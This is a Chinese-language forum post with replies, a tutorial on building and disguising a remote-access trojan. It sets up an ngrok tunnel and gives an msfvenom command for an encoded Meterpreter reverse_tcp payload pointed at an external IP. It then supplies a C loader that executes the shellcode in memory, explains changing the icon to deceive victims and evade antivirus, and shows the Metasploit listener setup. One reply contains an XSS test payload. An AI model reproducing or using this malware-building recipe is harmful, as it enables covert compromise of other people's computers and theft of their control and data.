找回密码
快捷导航
  
实现内网穿透的办法

a.免费的 ngrok (URL:https://ngrok.com/


ngrok 是一个免费的内网穿透的,但是正因为免费,所以使用他的时候有一些小的弊端。



        弊端:每次使用都要更改 LHOST 和 LPORT (这两个都是随机值)

    操作步骤如下:
    1.首先注册一个账号(我是使用的Github账号)
    2.首先登陆到 https://ngrok.com/download(ngrok)的下载页面
    3.选择匹配自己机子的安装包进行下载
    4.进行解压缩  
        unzip /path/to/ngrok.zip
          和
      输入自己的验证
          ./ngrok authtoken  自己的账号的验证 (https://dashboard.ngrok.com/auth
    5.以上步骤都操作完成之后,输入 ./ngrok tcp 1234,如果出现如下的图就算是成功了
    6.为了得到分配的IP,使用Ping ngrok的域名
        ping  0.tcp.ngrok.io

        b.购买一台服务器搭建MSF    这个就不详细说明了。(以后再续)        
2.木马的伪装和简单的免杀         

a.介绍     

木马面临的最基本的问题就是免杀,如果不能免杀,被杀毒软件发现,其作用几乎为零,至于怎么感染别人,就得看你的忽悠能力或者USB的方式,但是首要的应该是免杀]。 我采用的是比较简单的免杀方式,依靠msf生成的shellcode免杀。

1.png

2.jpg


        b.利用 msfvenom 生成简单的 shellcode.c文件
[PHP] 纯文本查看 复制代码
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=52.14.61.47 LPORT=13098 -e x86/shikata_ga_nai -i 15 PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/Desktop/shellcode.c


        对上进行说明:

这里的paylload选择 windows/meterpreter/reverse_tcp,LHOST和LPORT分别填ngrok给你的网址和端口,-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai编码15次,而PrependMigrate=true PrependMigrateProc=svchost.exe使这个程序默认会迁移到svchost.exe进程

自己测试的时候不建议到这个进程而是其他的持久进程,这样别人打开之后就无法再常规的去关闭回连的会话。你还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力


   
    c.编译木马

在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。

[HTML] 纯文本查看 复制代码
// ConsoleApplication0.cpp : 定义控制台应用程序的入口点。
//

#include "stdio.h"
#include "pch.h"
#include "Windows.h"

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除窗口
//步骤b所在桌面产生的 shellcode.c的内容;
unsigned char shellcode[] ="\xb8\x2c\xdb\xea\x03\xdb\xd6\xd0\x70\x20\xf0\x5b\x30\xc0\xb0"
"\xdc\x30\x03\x02\x03\x03\x02\x83\xc7\x27\x08\x66\xcc\x00\x70"
"\x6c\x60\xe0\x27\xb6\xf0\xce\xc3\x03\x2a\xc6\x0d\x00\x0d\xb2"
"\xc5\xfa\xb7\xbe\xf6\x06\xb6\x06\x07\x72\xa0\x22\xaf\x62\x52"
"\xef\x6c\x00\x03\xa0\xed\x55\xf5\x00\xbc\xe7\x6e\xb0\x50\x0e"
"\x03\x35\x30\xea\x0a\x57\xd0\xb5\xdd\x3e\x0a\x00\x02\xeb\x08"
"\xf0\x00\xf5\x60\x28\xf3\x60\xb8\x06\xa8\x2e\xf3\x83\xc0\xa0"
"\x2e\xfa\x03\x00\x63\x80\xf0\xdc\xd0\x0b\x0e\x6c\xb0\x70\xde"
"\xd0\x8d\x38\x00\x03\x63\xc3\xea\x0c\x77\x2b\x57\xe5\x63\x80"
"\x3c\x76\xdf\xee\x00\x07\x0a\xe2\x00\x50\xc5\xa0\xeb\xd5\xbd"
"\xe5\x80\x87\xc3\x3e\xc0\x07\xb5\xc7\x3f\x5a\xdd\xb5\x8f\x0b"
"\x2e\x37\xb2\x20\xd0\xf5\xe7\x8d\xc5\x80\x6f\xb6\xa0\xe5\x30"
"\x7e\x20\x26\xa8\x6b\xb2\x35\x02\x30\x00\xc0\xa0\x00\x6f\xa2"
"\x5f\xa2\x2e\x35\x08\xbd\x05\xf2\x8a\x57\xad\x5e\x08\xbc\x00"
"\xeb\x05\x5b\xd0\x2c\xa5\xda\x70\x80\x05\x05\x05\x0a\xbc\x20"
"\xc6\xf0\x05\x0c\x07\x50\x22\x33\x05\x36\xe3\xba\x58\x02\x63"
"\x78\xbd\x0e\xc5\x7a\x80\x0c\x8f\x72\x28\xca\xc0\x00\x06\x5f"
"\x32\x25\x2f\x0e\xfa\x0f\x38\x70\xb0\x30\x0b\x00\x00\x30\xe0"
"\xc6\x20\xbc\xf0\x60\x82\xa7\xbc\x30\x80\x0a\xa3\xfa\x50\x50"
"\x22\x00\x0b\x05\xd0\xc5\x6a\xe8\xa8\x00\x6c\x07\xdb\xf5\x86"
"\x0f\x0f\xbb\x6d\xdb\xea\x80\x5f\xf2\x73\x80\x5c\x5c\xea\xf0"
"\x50\x00\x55\xb2\x00\xac\x3d\x6c\x02\xcb\xec\x07\x87\x50\xaf"
"\x3d\xef\xcf\x62\x70\x75\xe2\xcf\x2e\x72\x82\xae\xac\xf0\x02"
"\x20\xb0\x00\xa3\x50\x0f\xca\xd0\x25\x08\xe0\x0d\x60\xa6\x00"
"\xf8\x03\x2b\xf5\xb0\x3e\xaa\xea\xc0\x00\x00\xe0\xc6\xf3\xfd"
"\xb5\x70\xcc\x02\x36\x08\x00\x36\x08\x08\x27\x3c\x0b\x3e\x00"
"\x00\x58\x06\x02\xbc\x8d\x00\x85\x3a\xe3\xe2\xdb\xb2\x0f\x0d"
"\x8c\x52\xc0\x70\x5e\x5f\xa3\x3e\x05\x6f\x68\x62\x35\x06\xcb"
"\xfb\x2b\xfd\xda\xcd\x03\x20\x36\xc7\xa0\x7b\x0e\xee\x23\x0c"
"\x00\x77\xb0\xf0\x3b\x07\x50\x00\x7b\x58\xab\xf0\x2e\x8f\x8d"
"\xb0\x08\xe0\x7b\x28\x7f\x2a\xdd\xce\x02\xa0\xb2\x03\x0f\x23"
"\xe0\x22\x2b\xfb\xd0\xa6\xcb\xf7\x78\xac\x08\x87\xc0\x0f\x76"
"\x60\xee\x52\x0e\xd0\x0f\x3a\xe0\x60\x20\x65\xf2\x52\x66\x0f"
"\x60\x8e\x52\x33\xfe\xc0\x20\x86\xfb\x07\xbc\x07\xc0\xda\xae"
"\xc0\x8b\x70\x20\x50\x00\xb3\xf6\x05\x08\x00\xf2\x05\xab\x60"
"\x0b\xbb\xb0\xff\xbf\xa0\xff\x07\xb0\x3e\x08\xe7\xbf\x2a\x87"
"\x20\xfd\x50\xab\x02\x00\xf0\x3c\x50\x50\xc8\x60\xdb\x5f\xbe"
"\x6f\xd0\xc5\x3d\xee\x60\x7b\xcb\x37\xa0\x02\xb0\x8b\xa2\x0b"
"\x06\xf6\xe6\x62\x80\xc8\xf0\xce\x00\xb0\xd0\xd5\x70\xe5\x3e"
"\xd6\x8a\xfd\xad\x80\x60\xcd\xe0\xa5\xc2\x02\x25\xc6\x5d\x50"
"\xf0\x76\x0e\x23\x80\x08\x50\x00\x30\xbe\x00\xa6\x06\x20\x6f"
"\x30\x07\x5f\x35\xe7\x00\x25\x80\x00\xa7\x80\x5a\x00\x5e\x27"
"\x50\x50\xda\xeb\xc5\x7d\xf8\x08\x3e\x0d\x28\xfc\xe6\xdd\x37"
"\xb6\xbf\x3c\xc3\x0b\x05\x08\x06\x5d\x0d\x30\x76\x00\x30\xc3"
"\xf8\x78\x02\x00\x06\xc3\x33\x08\x0d\x7c\x05\x30\x80\x76\x6b"
"\x06\xc5\x7c\x30\xb7\x22\xbf\xae\x80\xe5\x5d\xc2\x0a\xb3\x00"
"\x70\xe8\x6c\xd0\x06\x0e\xaa\x6b\xd0\x50\x0c\x5d\xbe\x0b\x7d"
"\xfd\xe8\xdf\x27\x03\x30\x88\x38\x20\x80\x07\x6b\x7a\x80\xb2"
"\x0a\x0c\xa0\x80\x6e\xc0\xfc\xce\xa3\xdd\xd7\x53\xc0\xdf\x63"
"\xf6\x02\xbc\x72\xd2\x05\x00\xe2\x7d\xf7\x0b\x77\xf8\x8f\x6a"
"\xb3\xb0\xf7\x03\x35\xd6\x35\x07\xc5\x6b\xa0\xf5\x73\xd7\x7f"
"\xb0\xd5\xf0\x0f\x50\x5b\xa2\xef\xc0\xd0\x0c\x63\x3a\xb3\xbe"
"\x38\xd2\x30\xe3\x0f\xc8\x05\xc2\x66\x55\xbf\x5c\x5f\x62\xad"
"\x0a\x08\x25\xd0\x23\xa7\xfc\xfa\x6b\x0b\x00\xc0\x58\x30\xc8"
"\xe8\x00\xeb\xf0\x0d\x0d\x36\xdd\x02\xde\x3a\xbd\x3d\x08\x07"
"\xae\x6e\xe3\x60\x25\xfc\xaf\xa3\xbc\x2b\x02\x60\xc2\x88\x03"
"\x2e\x2a\xcb\x50\xae\xed\xa0\x70\xa0\xae\x2f\xf6\xab\xc7\xcd"
"\xe0\x80\x3a\x67\xa6\xb8\x50\xfd\xad\x08\x82\x6c\x2e\x0a\xf5"
"\xf7\xb3\x5c\xa8\x0d\x00\x00\xde\x00\x0f\x50\x6d\x5d\x6a\x0a"
"\x20\x22\x08\x25\x33\xc8\xcd\x0f\xa0\x80\xb5\xe0\x0e\xb0\x07"
"\x50\x8c\x7e";
void main()

{
	//ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
	LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, shellcode, sizeof(shellcode));
	((void(*)())Memory)();
}






3.jpg


4.jpg


编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,然后自己可以在网上找到图片来替换掉图标以达到相应的迷惑性.

    注:http://www.bitbug.net/ 这个网站可以将我们的普通图片转换为 *.icon

        3.meterpreter后渗透功能测试         

a.设置好监听端   

使用ngrok的监听设置


[HTML] 纯文本查看 复制代码
 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1 
set LPORT 1234
exploit


使用自己的服务器的监听设置

[HTML] 纯文本查看 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 服务器NAT的地址
set LPORT 
exploit


2.png

QQ图片20180910125544.png




他没有一个有个性的自我介绍,你们不要理他!
  • TA的每日心情

    2018-10-24 16:10
  • 签到天数: 41 天

    连续签到: 1 天

    [LV.5]常住居民I

    0

    主题

    9

    帖子

    273

    积分

    新手白帽

    Rank: 1

    积分
    273
    QQ
    发表于 2018-9-13 09:17:22 | 显示全部楼层
    推荐
    工具给满分,排版给0分
    "><script>alert(1)</script>
  • TA的每日心情
    擦汗
    2018-10-12 02:58
  • 签到天数: 6 天

    连续签到: 1 天

    [LV.2]偶尔看看I

    0

    主题

    10

    帖子

    17

    积分

    新手白帽

    Rank: 1

    积分
    17
    发表于 2018-10-12 03:04:48 | 显示全部楼层
    板凳
    是的 有些许乱 不过够用了
    他没有一个有个性的自我介绍,你们不要理他!
      您需要登录后才可以回帖 登录 | 立即注册

      本版积分规则

      Powered by Discuz! X3.4  © 2001-2013 Comsenz Inc.